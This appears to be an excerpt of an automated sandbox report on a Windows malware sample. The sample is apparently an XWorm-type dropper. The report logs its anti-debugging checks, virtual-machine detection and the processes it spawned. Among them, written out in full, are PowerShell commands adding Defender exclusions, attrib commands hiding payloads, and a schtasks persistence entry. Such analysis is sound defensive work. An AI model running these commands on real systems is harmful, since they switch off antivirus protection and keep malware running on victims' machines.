                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596062s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595952s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595843s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595619s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595511s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595390s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595171s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -595062s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -594951s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -594799s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -594672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -594531s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -594323s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -594075s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593969s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593859s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593749s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593640s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593531s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593418s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593306s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593187s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -593059s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3648Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep count: 6917 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3796Thread sleep count: 2630 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep count: 6105 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376Thread sleep count: 3623 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\System User.exe TID: 7908Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\System User.exe TID: 8180Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\System User.exe TID: 3716Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\System User.exe TID: 5940Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\System User.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\System User.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5883B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7FF5883B0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5892F0 FindFirstFileExW,FindClose,0_2_00007FF7FF5892F0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7FF5A18E4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5892F0 FindFirstFileExW,FindClose,2_2_00007FF7FF5892F0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7FF5A18E4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5883B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7FF5883B0
Source: msedge.exe, 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: msedge.exe, 0000000C.00000002.2749735501.000000001B481000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: dddd.exe, 0000000E.00000002.1727415160.0000026232500000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXX
Source: C:\Users\user\AppData\Local\Temp\msedge.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Code function: 12_2_00007FFB49897A81 CheckRemoteDebuggerPresent,12_2_00007FFB49897A81
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF59A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7FF59A684
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A34F0 GetProcessHeap,0_2_00007FF7FF5A34F0
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\System User.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\System User.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF58C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7FF58C910
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF59A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7FF59A684
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF58D37C SetUnhandledExceptionFilter,0_2_00007FF7FF58D37C
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF58D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7FF58D19C
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF58C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF7FF58C910
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF59A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7FF59A684
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF58D37C SetUnhandledExceptionFilter,2_2_00007FF7FF58D37C
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FF7FF58D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7FF58D19C
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB6137D0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBBB6137D0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB613210 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBBB613210
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB63A96C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBBB63A96C
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBB639F40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBBB639F40
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 2_2_00007FFBBCD50E08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBBCD50E08
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: dddd.exe PID: 6476, type: MEMORYSTR
Source: Yara match | File source: \Device\ConDrv, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe'
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe'
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Process created: C:\Users\user\Desktop\YgJ5inWPQO.exe "C:\Users\user\Desktop\YgJ5inWPQO.exe"
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe"
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe"
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\msedge.exe"
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\dddd.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\msedge.exe C:\Users\user\AppData\Local\Temp\msedge.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\dddd.exe C:\Users\user\AppData\Local\Temp\dddd.exe
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe'
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe'
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe"
Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: msedge.exe, 0000000C.00000002.2742589628.000000000266F000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002678000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: msedge.exe, 0000000C.00000002.2742589628.000000000266F000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002678000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: msedge.exe, 0000000C.00000002.2742589628.000000000266F000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002678000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: msedge.exe, 0000000C.00000002.2742589628.000000000266F000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002678000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2{
Source: msedge.exe, 0000000C.00000002.2742589628.000000000266F000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002678000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Code function: 0_2_00007FF7FF5A95E0 cpuid 0_2_00007FF7FF5A95E0
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322 VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322 VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322 VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322 VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\_bz2.pyd VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322 VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\_lzma.pyd VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI4322 VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\Desktop\YgJ5inWPQO.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\msedge.exe VolumeInformation
Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\dddd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\msedge.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\dddd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
